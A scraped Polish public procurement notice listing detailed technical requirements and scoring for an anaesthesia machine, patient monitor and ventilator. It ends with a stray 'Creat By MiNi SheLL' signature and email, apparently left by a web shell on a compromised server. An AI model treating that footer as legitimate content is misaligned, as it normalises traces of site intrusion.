komplecie jednorazowe układy oddechowe z workiem (długość rur do pacjenta, co najmniej 170 cm, objętość bezlateksowego worka do wentylacji ręcznej 2.0L) - 25 szt.	TAK 22. System oddechowy na ramieniu obrotowym ułatwiającym odpowiednie ustawienie	TAK 23. Obejście tlenowe, podać wydajność	TAK 24. Regulowany zawór ograniczający ciśnienie w trybie wentylacji ręcznej (APL)	TAK 25. Zawór APL z funkcją natychmiastowego zwolnienia ciśnienia w układzie bez konieczności skręcania do minimum, opisać	TAK 26. Pochłaniacz dwutlenku węgla, jednorazowego użytku, objętość min 1100 ml, podłączony do aparatu	TAK 27. W dostawie, w sumie, 6 jednorazowych zbiorników z wapnem sodowanym	TAK 28. Ewakuacja bierna zużytych gazów, w dostawie rura do ewakuacji (jeden mankiet ze specjalnymi otworami) o długości 5 m i wtyk do gniazda odciągu typu DIN	Tak RESPIRATOR ANESTETYCZNY29. Respirator anestetyczny wbudowany	TAK 30. Wentylacja pacjentów ze wszystkich grup wiekowych nie wymaga użycia odmiennych elementów systemu oddechowego i czujników z wyłączeniem rur oddechowych i worka do wentylacji ręcznej	TAK 31. Respirator napędzany elektrycznie lub pneumatycznie, podać	TAK 32. Respirator ekonomiczny, nie zużywający gazów do napędu, TAK/NIE Tak - 3 pktNie - 0 pkt33. Kolorowy ekran LCD, przekątna minimum 6 cali, podać	TAK 34. Ekran respiratora wbudowany w ścianę przednią aparatu	TAK/NIE Tak - 1 pktNie - 0 pkt35. Obsługa respiratora za pomocą pokrętła funkcyjnego i/lub przycisków wyboru	TAK TRYBY WENTYLACJI36. Tryb ręczny	TAK 37. Oddech spontaniczny	TAK 38. Wentylacja kontrolowana objętościowo (VCV)	TAK 39. Wentylacja synchronizowana kontrolowana objętościowo (SIMV)	TAK 40. Wentylacja synchronizowana kontrolowana objętościowo ze wspomaganiem ciśnieniowym (SIMV/PS)	TAK 41. Możliwość rozbudowy w przyszłości o wentylację wspomaganą ciśnieniowo z zabezpieczeniem na wypadek bezdechu (PSV)	TAK/NIE Tak - 1 pktNie - 0 pkt42. Wentylacja kontrolowana ciśnieniowo (typu PCV)	TAK 43. Awaryjny tryb wentylacji - możliwa wentylacja ręczna po zaniku napięcia zasilającego i rozładowaniu się akumulatora, opisać	TAK 44. Awaryjny tryb wentylacji - możliwa wentylacja mechaniczna przy braku dopływu świeżych gazów medycznych (z sieci centralnej, z butli), opisać	TAK/NIE Tak - 2 pktNie - 0 pktREGULACJE45. Regulacja stosunku wdechu do wydechu, podać zakres	TAK 46. Możliwe odwrócenia stosunku wdechu do wydechu powyżej 3:1	TAK/NIE Tak - 2 pktNie - 0 pkt47. Regulacja częstości oddechów minimum od 4 do 60 odd/min, podać zakres	TAK 48. Regulacja objętości oddechowej minimum od 20 do 1200 ml, podać zakres	TAK 49. Regulacja PEEP - dodatnie ciśnienie końcowo wydechowe, w zakresie minimum od 4 do 20 cmH2O (hPa), podać zakres	TAK 50. Możliwa regulacja PEEP od 0 cmH2O (hPa)	TAK/NIE Tak - 2 pktNie - 0 pkt51. Regulacja ciśnienia wdechowego przy PCV w zakresie minimum od 10 do 60 cmH2O (hPa), podać zakres	TAK 52. Regulacja Plateau w zakresie minimum od 20% do 50% TAK 53. Regulacja Plateau od 0%	TAK/NIE Tak - 2 pktNie - 0 pktALARMY54. Niskiej i wysokiej objętości minutowej lub niskiej i wysokiej objętości oddechowej	TAK 55. Alarm minimalnego i maksymalnego ciśnienia wdechowego	TAK 56. Alarm braku zasilania w energię elektryczna	TAK 57. Alarm braku dopływu lub spadku ciśnienia tlenu	TAK 58. Alarm Apnea	TAK PREZENTACJA WARTOŚCI LICZBOWEJ59. Objętości oddechu Vt	TAK 60. Objętości minutowej MV	TAK 61. Częstotliwości oddechowej f	TAK 62. Ciśnienia szczytowego	TAK 63. Ciśnienia średniego	TAK 64. Ciśnienia plateau	TAK 65. Ciśnienia PEEP	TAK INNE66. Szyna parowników z jednym lub dwoma lub trzema aktywnymi miejscami do jednoczesnego zawieszenia dwóch lub trzech parowników, przynajmniej jedno miejsce z mocowaniem typu Dräger TAK 67. Dodatkowy, niezależny, zintegrowany przepływomierz do podaży O2 przez maskę lub kaniulę	TAK 68. Dodatkowa lampka halogenowa lub LED, na elastycznym ramieniu, zamocowana przy aparacie.	TAK KARDIOMONITOR DO APARATU DO ZNIECZULANIAWYMAGANIA OGÓLNE69. Monitor pacjenta umożliwia podłączenie do klinicznych systemów informatycznych (CIS) zbierających parametry życiowe pacjenta, w celu umożliwienia prowadzenia dokumentacji medycznej (karty znieczulenia) w formie elektronicznej. Dostępny system informatyczny typu CIS producenta oferowanego kardiomonitora, w języku polskim - podać nazwę.	TAK 70. Pojedynczy monitor pacjenta, stacjonarno-transportowy, umożliwia monitorowanie parametrów życiowych oraz ich wyświetlanie przy łóżku pacjenta oraz w trakcie transportu, zgodnie z opisem w dalszej części specyfikacji.	TAK 71. Monitor pacjenta modułowy. Dotyczy sprzętu i oprogramowania. Poszczególne moduły pomiarowe przenoszone między monitorami i podłączane bez udziału serwisu.	TAK 72. Moduły pomiarowe jedno i/lub wieloparametrowe, przenoszone pomiędzy stanowiskami. Podłączenie modułu zapewnia automatyczne rozpoczęcie pomiaru i zmianę konfiguracji ekranu.	TAK 73. Cały system chłodzony konwekcyjnie, bez użycia wentylatorów	TAK 74. Monitor posiada tryb ,,standby" umożliwiający wprowadzenie monitora w stan uśpienia - wyciszenie alarmów przy odłączeniu pacjenta od monitora, bez utraty danych osobowych pacjenta ani spersonalizowanych funkcji / poziomów alarmów	TAK 75. Monitor posiada tryb prywatności umożliwiający nieprzerwane monitorowanie parametrów życiowych pacjenta i funkcjonowanie alarmów, bez wyświetlania ich na ekranie monitora stacjonarnego i modułu transportowego	TAK 76. Monitor umożliwia pełną konfigurację jego opcji/funkcji w trakcie pracy, bez konieczności przerywania monitorowania pacjenta	TAK 77. Możliwość podłączenia ekranu kopiującego	TAK PRACA W SIECI CENTRALNEGO MONITOROWANIA78. Monitory mogą pracować w przewodowej sieci centralnego monitorowania zgodnej ze standardem IEEE802.3 Ethernet	TAK 79. Możliwość rozbudowy oferowanych monitorów o bezprzewodowe podłączenie do sieci centralnego monitorowania zgodnie ze standardami IEEE802.11a lub IEEE802.11b/g z zabezpieczeniem przynajmniej WPA2-PSK	TAK 80. Oferowane monitory umożliwiają wykorzystanie jednej infrastruktury sieciowej (w sieci przewodowej i bezprzewodowej) do celów sieci centralnego monitorowania, monitorowania telemetrycznego oraz pozostałych aplikacji szpitalnych	TAK/NIE TAK - 1 pktInne - 0 pkt81. Sieć centralnego monitorowania wykorzystuje standardowe rozwiązania sieciowe (okablowanie, switche, routery, punkty dostępowe sieci bezprzewodowej itp.). Brak konieczności stosowania unikalnych rozwiązań producenta oferowanych monitorów.	TAK 82. Monitory przystosowane do podglądu danych z pozostałych monitorów pacjenta (przebiegi krzywych dynamicznych, wartości parametrów, alarmy w czasie rzeczywistym) pracujących w sieci centralnego monitorowania, umożliwiają przynajmniej zdalne wyciszenie alarmu i wygenerowanie wydruku. Opisana współpraca zależna jedynie od działania sieci LAN (nie wykorzystuje stanowiska centralnego monitorowania, specjalistycznych serwerów, itp.)	TAK 83. Możliwość wyposażenia monitora w drukarkę sieciową, umożliwiającą wydruki ekranu, a także prekonfigurowanych raportów (np. raport trendów tablicowych), dostępnych w monitorze pacjenta.	TAK 84. Możliwość korzystania ze wspólnej drukarki przez stanowisko centralnego monitorowania oraz oferowane monitory podłączone do sieci przesyłania danych	TAK MONTAŻ85. Monitor pacjenta mocowany do oferowanego aparatu do znieczulania. Dostępne również systemy montażu monitora na ścianę oraz kolumnę medyczną.	TAK 86. Monitor pacjenta mocowany na stacji dokującej, w sposób zapewniający błyskawicznie rozpoczęcie transportu pacjenta	TAK 87. Dostępne mocowania do ramy łóżka, pozwalające na szybkie zamocowanie i zdjęcie monitora na czas transportu	TAK SPECYFIKACJA MONITORA88. Monitor pacjenta wyposażony w kolorowy ekran o przekątnej przynajmniej 10" (dostępny w czasie monitorowania stacjonarnego i w czasie transportu), zapewnia jednoczesne wyświetlanie przynajmniej 5 krzywych dynamicznych na ekranie (bez wykorzystania ekranu 12-odprowadzeń EKG)	TAK 89. Monitor pacjenta wyposażony w wewnętrzny akumulator umożliwiający nieprzerwane monitorowanie i wyświetlanie zmierzonych wartości przez co najmniej 4 godziny na wypadek transportu lub braku zasilania	TAK 90. Monitor pacjenta umożliwia nieprzerwane monitorowanie stacjonarnie i w transporcie przynajmniej: EKG, ST, Arytmia, Oddech, Saturacja, Temperatura - 1 kanał, NIBP, IBP - 2 kanały, NMT	TAK 91. Monitor pacjenta umożliwia rozbudowę o nieprzerwane monitorowanie stacjonarnie i w transporcie przynajmniej: EKG (do 12 odprowadzeń diagnostycznie), ST, Arytmia, Oddech, Saturacja, Temperatura - 2 kanały, NIBP, IBP - 4 kanały, NMT, BIS, rzut serca	NIE TAK - 1 pktInne - 0 pkt92. Monitor pacjenta wyposażony w pamięć przynajmniej 24 godzin trendów graficznych i tablicowych, z rozdzielczością 1 minuta w całym zakresie	TAK 93. Monitor pacjenta umożliwia przeniesienie danych demograficznych, zdarzeń alarmowych oraz trendów monitorowanych parametrów po przejściu z jednego stanowiska na drugie, w tym danych zapamiętanych w czasie transportu, z zachowaniem chronologii	TAK 94. Monitor pacjenta wyposażony w pamięć przynajmniej 50 zdarzeń alarmowych i zapisywanych ręcznie, zawierających 20-sekundowe odcinki przynajmniej 2 krzywych dynamicznych oraz wartości wszystkich monitorowanych parametrów	TAK ZASILANIE95. Sieciowe 230V 50 Hz i akumulatorowe zgodne z PN; zewnętrzny zasilacz	TAK MONITOROWANE PARAMETRYEKG96. Monitorowanie przynajmniej 1 z 3, 7- i 12- odprowadzeń w zależności od zastosowanego przewodu EKG	TAK 97. Możliwość monitorowania 12 odprowadzeń EKG z jakością diagnostyczną z 10 elektrod	TAK 98. Możliwość monitorowania 12 odprowadzeń EKG z max. 6 elektrod	TAK Algorytm wykorzystuje standardowe rozmieszczenie elektrod na ciele pacjenta - 1 pkt.99. W ofercie do każdego monitora ujęty wielorazowe przewody EKG do podłączenia 3 i 5 elektrod, z klipsami do elektrod umieszczonymi szeregowo na pojedynczym przewodzie	TAK 100. Monitor wyposażony w uruchamiany na żądanie filtr elektrochirurgiczny	TAK ANALIZA ST101. Możliwość rozbudowy o analizę odcinka ST w 12 odprowadzeniach, w zakresie przynajmniej od -15 do +15 mm, o monitorowanie wartości sumarycznego wektora odchyleń ST (STVM) z 12 odprowadzeń z możliwością ustawiania własnych granic alarmowych	TAK 102. Możliwość rozbudowy o monitorowanie zmian w czasie sumarycznego wektora ST z 12 odprowadzeń, z możliwością ustawiania własnych granic alarmowych	NIE TAK - 1 pktInne - 0 pktANALIZA ARYTMII103. Podstawowe monitorowanie arytmii w zakresie tzw. arytmii śmiertelnych. Możliwość rozbudowy o zaawansowane monitorowanie arytmii wg przynajmniej 10 definicji.	TAK SATURACJA (SPO2)104. Moduł pomiarowy zapewniający poprawne pomiary w warunkach niskiej perfuzji i artefaktów ruchowych algorytmem Nellcor OxiMax	TAK 105. Wyświetlane wartości cyfrowe saturacji, tętna oraz krzywa pletyzmograficzna	TAK 106. W ofercie do każdego monitora ujęty kabel przejściowy oraz wielorazowy czujnik saturacji na palec (tylu klips) dla dorosłych Oryginalne czujniki dostawcy algorytmu pomiarowego.	TAK TEMPERATURA107. Pomiar temperatury w 1 kanale. Możliwość rozbudowy o drugi kanał i pomiar dwóch wartości temperatury oraz ich różnicy	TAK 108. Zakres pomiarowy temperatury przynajmniej 0-50?C, dokładność pomiaru przynajmniej 0,1?C	TAK 109. W ofercie do każdego monitora ujęty wielorazowy czujnik temperatury skóry	TAK 110. Możliwość rozbudowy o moduł, sterowany z poziomu oferowanego kardiomonitora, umożliwiający całkowicie nieinwazyjny pomiar temperatury centralnej, z wykorzystaniem czujnika na czoło	NIE TAK - 1 pktInne - 0 pktCIŚNIENIE METODĄ NIEINWAZYJNĄ (NIBP)111. Pomiar w zakresie przynajmniej: od 10mmHg dla ciśnienia rozkurczowego do 250mmHg dla ciśnienia skurczowego	TAK 112. Tryb pracy ręczny, ciągły przez określony czas i automatyczny co określony czas	TAK 113. Szeroki zakres odstępów czasowych automatycznych pomiarów - przynajmniej 1 minuta - 4 godziny	TAK 114. Funkcja stazy żylnej	TAK 115. Mankiety pomiarowe bez lateksu i innych potencjalnie niebezpiecznych substancji chemicznych	TAK 116. W komplecie do każdego monitora ujęty wężyk oraz 2 sztuki wielorazowych mankietów dla dorosłych (umożliwiających monitorowanie NIBP u pacjentów o obwodzie ramienia przynajmniej od 17 do 53cm)	TAK CIŚNIENIE METODĄ INWAZYJNĄ (IBP)117. Monitorowanie 2 ciśnień metodą inwazyjną z możliwością rozbudowy do min. 4 kanałów ciśnienia	TAK 118. Dokładność pomiaru przynajmniej ?1 mmHg	TAK 119. Możliwość monitorowania i wyboru nazwy różnych ciśnień, przynajmniej: ciśnienia tętniczego, ciśnienia tętnicy płucnej, ośrodkowego ciśnienia żylnego, ciśnienia śródczaszkowego	TAK 120. Wybór nazwy ciśnienia powoduje automatyczny wybór algorytmu pomiarowego, skali, koloru i sposobu wyświetlania parametru	TAK 121. W komplecie do każdego monitora ujęte akcesoria niezbędne do podłączenia przetworników ciśnienia do każdego kanału typu ARGON. (nie dotyczy dostawy przetworników)	TAK MONITOROWANIE GAZOWE122. Pomiary, za pośrednictwem modułu obsługiwanego w pełnym zakresie funkcji z poziomu oferowanego kardiomonitora lub w aparacie do znieczulania	TAK 123. Pomiar stężenia: O2, CO2, N2O oraz anestetyków na wdechu i wydechu	TAK 124. Pomiar stężenia O2 paramagnetyczny	TAK 125. Moduł pomiarów gazowych nie wymaga prowadzenia okresowej kalibracji przy użyciu tzw. gazów kalibracyjnych 126. W komplecie akcesoria niezbędne do realizacji pomiarów: przynajmniej 12 szt. pułapek wodnych oraz 10 szt. linii próbkujących	TAK ZWIOTCZENIE MIĘŚNI (NMT)127. Pomiar za pośrednictwem modułu obsługiwanego w pełnym zakresie funkcji z poziomu oferowanego kardiomonitora.	TAK 128. Dostępne tryby stymulacji:- pojedynczy impuls, - seria poczwórna,- liczba potężcowa.	TAK 129. Pomiar z wykorzystaniem akcelerometru mocowanego do kciuka	TAK 130. W ofercie do każdego monitora ujęty akcelerometr oraz 50 szt. jednorazowych uchwytów do montażu na kciuk	TAK MOŻLIWOŚĆ ROZBUDOWY131. Możliwość rozbudowy monitora o po pomiar głębokości uśpienia metodą BIS, z wykorzystaniem modułów do oferowanego systemu monitorowania, dostępny stacjonarnie i w transporcie	TAK 132. Możliwość rozbudowy monitora o ciągły pomiar rzutu minutowego serca metodą PiCCO, z wykorzystaniem modułu do oferowanego systemu monitorowania, dostępny stacjonarnie i w transporcie	TAK 133. Możliwość rozbudowy monitora o ciągły nieinwazyjny pomiar ciśnienia tętniczego CNAP, również w czasie transportu, z wykorzystaniem modułu do oferowanego systemu monitorowania, dostępny stacjonarnie i w transporcie	NIE TAK - 1 pktInne - 0 pkt134. Możliwość rozbudowy o wyświetlanie danych z oferowanego aparatu do znieczulania na ekranie monitora: przynajmniej krzywe, pętle, parametry, dane dotyczące stężenia anestetyków	TAK UKŁADY ALARMOWE135. Alarmy o przynajmniej 3 poziomach ważności, rozróżniane dźwiękowo i kolorystycznie	TAK 136. Sprzętowy wskaźnik alarmów widoczny z każdej strony urządzenia, również z tyłu	TAK 137. Możliwość wyciszenia, wstrzymania i całkowitego wyłączenia alarmów	TAK 138. Możliwość pauzowania alarmów przy jednoczesnym zachowaniu dalszego sygnalizowania: akustycznie i wizualnie, alarmów wyższego poziomu	TAK 139. Ustawianie granic alarmowych wszystkich parametrów ręczne i automatyczne	TAK 140. Możliwość ustawienia automatycznego drukowania w czasie określonych alarmów (po podłączeniu drukarki)	TAK 141. Alarmy techniczne z podaniem przyczyny	TAK INNE142. Szkolenie obsługi, szkolenie personelu technicznego przy odbiorze technicznym produktów	TAK 143. Okres gwarancji w miesiącach (wymagany min. 36 miesięcy)	TAK 144. Autoryzowany Serwis Producenta na terenie Polski	TAK 145. Aparat z monitorem jest kompletny i będzie gotowy do użytkowania bez żadnych dodatkowych zakupów i inwestycji (poza materiałami eksploatacyjnymi).	TAK 146. Ze względów serwisowych i obsługowych, aparat do znieczulania i kardiomonitor tego samego producenta	TAK 147. W komplecie Instrukcje Obsługi w języku polskim	TAK 148. Odbiór od Zamawiającego i utylizacja wskazanego aparatu do znieczulania TAK <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33100000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zapłaty</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Pakiet nr 2 - Respirator </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Respirator do długotrwałej terapii niewydolności oddechowej różnego pochodzenia dla dorosłych2	Awaryjne zasilanie z wewnętrznego akumulatora do podtrzymania pracy aparatu (nie tylko alarmów) na minimum 45 minut; zasilanie AC 230 V /50 Hz +/- 10%3	Respirator na podstawie jezdnej, min dwa kółka wyposażone w blokadę.4	Wentylacja kontrolowana objętością VCV5 Wentylacja kontrolowana ciśnieniem PCV6	Wentylacja ciśnieniowo kontrolowana z docelową objętością oddechową typu PRVC, AutoFlow, VG7	CMV/ Assist8	SIMV9	PS10	PEEP/CPAP 11	Możliwość rozbudowy o tryb wentylacji z zagwarantowaną objętością minutową12	Wdech manualny.13	Oddech spontaniczny14	Westchnienia automatyczne z regulacją parametrów15	Wentylacja spontaniczna na dwóch poziomach ciśnienia: BIPAP lub Bilevel lub SPAP16	Możliwość rozbudowy o wentylację typu APRV17	Częstość oddechów minimalny zakres 5-80 odd./min18	Objętość pojedynczego oddechu minimalny zakres 50- 2000 ml19	Czas wdechu minimalny zakres 0,2 - 4 s20	Stężenie tlenu w mieszaninie oddechowej regulowane płynnie w zakresie 21 - 100%21	Ciśnienie wdechowe PCV minimalny zakres 2 - 80 cmH2O22	Ciśnienie wspomagania PSV minimalny zakres 0 - 50 cmH2O23	PEEP/CPAP minimalny zakres 0 - 40 cmH2O24	Przepływowy tryb rozpoznawania oddechu własnego pacjenta minimalny zakres 1 - 10 l/min25	Regulowane procentowe kryteriumzakończenia fazy wdechowej w trybiePSV minimalny zakres 10 - 70 [%]26	Wbudowany kolorowy, dotykowy monitor obrazowania parametrów wentylacji, przekątna minimum 12 cali27	ATC - automatyczna kompensacja oporów rurki intubacyjnej - możliwość stosowania rurek z wewnętrzną średnicą do min. 12 mm28	Integralny pomiar stężenia tlenu 29	Możliwość rozwinięcia w przyszłości o tryb APRV30	Całkowita częstość oddychania31	Częstość oddechów spontanicznych32	Objętość pojedynczego oddechu33	Pomiar wielkości objętości przecieku w układzie pacjenta34	Ciśnienie szczytowe35	Średnie ciśnienie w układzie oddechowym36	Stosunek wdech/wydech I:E37	Ciśnienie PEEP/CPAP38	Ciśnienie plateau39	Pomiar oporności 40	Pomiar podatności 41	Możliwość rozwinięcia w przyszłości o dodatkową podstawę jezdną do butli O2 dokowaną do podstawy jezdnej respiratora - przedstawić zdjęcie proponowanego rozwiązania42	Prezentacja trendów z ostatnich 10 dni (dotyczy trendy wartości mierzonych i parametrów ustawianych przez operatora)43	Wyposażenie dodatkowe: 50 szt. układówoddechowych jednorazowych dł. min. 180cm , 10 szt. zastawek wydechowych jednorazowych, 1szt. zastawka wydechowa wielorazowa dodezynfekcji i sterylizacji, 5 szt. czujników przepływu do dezynfekcji, płuco testowe wielokrotnego użytku, 44	Respirator wyposażony w szyny boczne dozamontowania innych akcesoriówALARMY45	Braku zasilania w energię elektryczną46	Całkowitej objętości minutowej (wysokiej i niskiej)47	Niskiej objętości oddechowej pojedynczego oddechu48	Wysokiego ciśnienia w układzie pacjenta49	Niskiego ciśnienia w układzie pacjenta50	Wysokiej częstości oddechowej51	Bezdechu 52	Hierarchia alarmów w zależności od ważności53	Pamięć alarmów i zdarzeń z ich opisem, minimum 500 zdarzeńINNE54	Nebulizator do respiratora, 55	Ramię przegubowe, uchylne do układu oddechowego pacjenta wraz z szyną boczną do mocowania akcesoriów56	Obsługa poprzez ekran, przyciski i pokrętłoINNE57	Wymagane menu i instrukcja obsługi w j. polskim58	Gwarancja 10-letniego dostępu do części zamiennych59	Produkt fabrycznie nowy, rok produkcji - 2016 60	Gwarancja min. 36 miesiące61	Gwarancja liczona od daty podpisania protokołu odbioru przez Zamawiającego62	Paszport techniczny63	Bezpłatne przeglądy techniczne w okresie gwarancji. Częstotliwość przeglądów zgodnie z zaleceniami producenta64	Bezpłatne szkolenie personelu (pielęgniarskiego i lekarskiego ) w zakresie obsługi i dezynfekcji.65	Serwis techniczny gwarancyjny pogwarancyjny prowadzony przez autoryzowany serwis.66	Sprzęt zastępczy w sytuacji naprawy dłuższej niż 5 dni67	Czas reakcji serwisu - do 48 godzin od daty powiadomienia68	Gwarancja minimum 36 miesiące OCENIANE36 miesiące - 0 pktwięcej niż 36 miesięcy do 48 miesięcy - 5 pktwięcej niż 48 miesięcy do 60 miesięcy - 10 pkt<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33100000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zapłaty</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com